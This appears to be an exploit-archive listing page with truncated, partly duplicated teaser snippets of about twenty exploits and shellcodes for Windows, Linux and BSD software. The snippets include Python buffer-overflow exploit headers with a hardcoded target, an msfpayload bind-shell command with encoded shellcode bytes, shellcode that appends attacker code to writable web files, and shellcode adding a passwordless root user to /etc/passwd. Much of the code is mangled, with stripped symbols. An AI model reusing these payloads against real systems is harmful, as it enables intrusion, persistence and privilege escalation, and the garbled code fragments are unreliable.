Avira-Guard

Avira AntiVir personal edition avguard.exe 7.00.00.52 is prone to a local heap overflow because it fails to perform adequate boundary-checks. Successfully exploiting will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will resul...

GreenBrowser iframe content Double Free Vulnerability

GreenBrowser searchbar iframe content Double Free Vulnerability ------------------------------------------------------------------ I. Summary All versions of GreenBrowser is prone to a vulnerability which leads to arbitrary code execution. A Double Free of iframe object is triggered by its shortc...

Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)

!/usr/bin/python import socket targetaddress="10.10.10.129" targetport=80 buffer2 = "R0cX" + "R0cX" msfpayload windows/shellbindtcp LPORT=4444 R | msfencode -e x86/shikataganai -c 4 -t c buffer2 += "\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"...

BIG-Ant-Server

BigAnt Server 2.52 remote buffer overflow exploit suffer because it fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will...

Linux/x86 Search For php,html Writable Files and Add Your Code

No description provided by source. ; Title : Linux/x86 Search php,html writable files and add your code. ; Date : 2011-10-24 ; Author: rigan - imrigan sobachka gmail.com ; Size : 380 bytes + your code. ; ; Note : This shellcode writes down your code in the end of ; found files. Your code will be...

Sysax-multi

A boundary error in the SYSAX multi server 5.50 Create Folder Buffer Overflow Date Discovered: January 13, 2012 Vendor Response: January 16, 2012 Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue import socket,sys target = sys.argv1 port = intsys.argv2 sid = sys.argv3 os = XP if...

Sysax Multi Server 5.50 - Create Folder Buffer Overflow

Sysax Multi Server 5.50 - Create Folder Buffer Overflow !/usr/bin/python Title: Sysax Multi Server 5.50 Create Folder BOF Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit and Server 2003 SP2 32bitNo DEP Date Discovered: January 13, 2012 Vendor Contacted: January 15, 2012 Vendor Response:...

Linux/x86 Search For php/html Writable Files and Add Your Code

Linux/x86 Search For php/html Writable Files and Add Your Code. Shellcode exploit for linx86 platform ; Title : Linux/x86 Search php,html writable files and add your code. ; Date : 2011-10-24 ; Author: rigan - imrigan sobachka gmail.com ; Size : 380 bytes + your code. ; ; Note : This shellcode...

linux/x86 Search For php,html Writable Files and Add Your Code

; Title : Linux/x86 Search php,html writable files and add your code. ; Date : 2011-10-24 ; Author: rigan - imrigan sobachka gmail.com ; Size : 380 bytes + your code. ; ; Note : This shellcode writes down your code in the end of ; found files. Your code will be added only .html and .php ; files...

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...

bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) 94 bytes

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

Microsoft Internet Explorer JavaScript OnLoad Handler Code Execution

Exploit for windows platform in category remote exploits This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework...

WorldMail imapd 3.0 SEH Overflow

!/usr/bin/python import sys import socket Exploit Title: WorldMail imapd 3.0 SEH overflow egg hunter Tested on: XP SP3 en-us Author: TheXero Website: www.thexero.co.uk http://www.nullsecurity.net Check for parameters if lensys.argv != 3: print "Usage: " + sys.argv0 + " 127.0.0.1 143" quit Assigns...

Blade API Monitor 3.6.9.2 Buffer Overflow

Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow the serial number!! Date: 25/12/2011 Author: FullMetalFouad Version: 3.6.9.2 Tested on: Windows XP/7 my $file= "bofblade.txt"; windows/Winexec - 178 bytes VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3 ALPHA3\ALPHA3.py x86...

Microsoft Office 2003 Home/Pro 0day

No description provided by source. !/usr/bin/python ----------------------------------------------------------------------------------- Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 Authors: b33f Ruben Boonen && g11tch Chris Hodges One shellcode to rule them all, One shellco...

Microsoft Office 2003 Home/Pro 0day

Exploit for windows platform in category local exploits !/usr/bin/python ----------------------------------------------------------------------------------- Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 Authors: b33f Ruben Boonen && g11tch Chris Hodges One shellcode to rule...

Microsoft Office 2003 HomePro - Code Execution (MS10-087)

Microsoft Office 2003 HomePro - Code Execution MS10-087 !/usr/bin/python Note from the Exploit-DB team: This might be the same bug as: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10087rtfpfragmentsbof.rb...

MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution

This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt places our shellcode near where the call operand points...

TFTP-Server-1.4ST

Stack-Based buffer overflow in TFTP Server SP 1.4 for Windows allow remote attackers to cause a DoS or execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error in the handling of filenames and can be exploited to cause a stack-base...

Linux/x86 Polymorphic ShellCode - setuid0+setgid0+add user 'iph' without password to /etc/passwd

Linux/x86 Polymorphic ShellCode - setuid0+setgid0+add user 'iph' without password to /etc/passwd. Shellcode exploit for linx86 platform / Exploit Title: Linux/x86 Polymorphic ShellCode - setuid0+setgid0+add user 'iph' without password to /etc/passwd setuid - setgid - open - write - close - exit...